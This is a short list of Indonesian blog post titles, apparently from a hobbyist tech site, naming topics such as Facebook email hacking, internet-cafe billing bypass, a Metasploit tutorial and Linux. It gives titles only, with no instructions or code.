  58. Cara Membuat Komputer Langsung Shutdown Saat Di Hi...
  59. bobol biling warnet( masuk sebagai admin)
  60. metasploit tutorial
  61. kelebihan OS linux
  62. cara hack email facebook (newbie inside)
  63. nonton starwars di cmd milik kalian